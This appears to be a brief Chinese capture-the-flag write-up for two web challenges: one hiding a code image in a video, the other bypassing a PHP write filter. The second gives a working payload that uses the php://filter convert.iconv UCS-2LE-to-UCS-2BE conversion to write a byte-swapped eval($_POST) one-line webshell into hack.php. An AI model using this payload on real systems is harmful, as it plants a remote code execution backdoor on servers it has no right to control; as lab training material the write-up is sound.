web116
开启容器
提示:misc+lfi
是一个视频下载过来
找到png文件,导出得到一个代码图片
找到flag
web117
开启容器
代码审计
解答:两个参数,有过滤,有die。
string字符串过滤器被过滤了,base64也被过滤了,但还有convert.iconv.
把一句话木马从UCS-2LE编码转换为UCS-2BE编码。
?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=hack.php
post:contents=?<hp pe@av(l_$OPTSj[]z;)>?
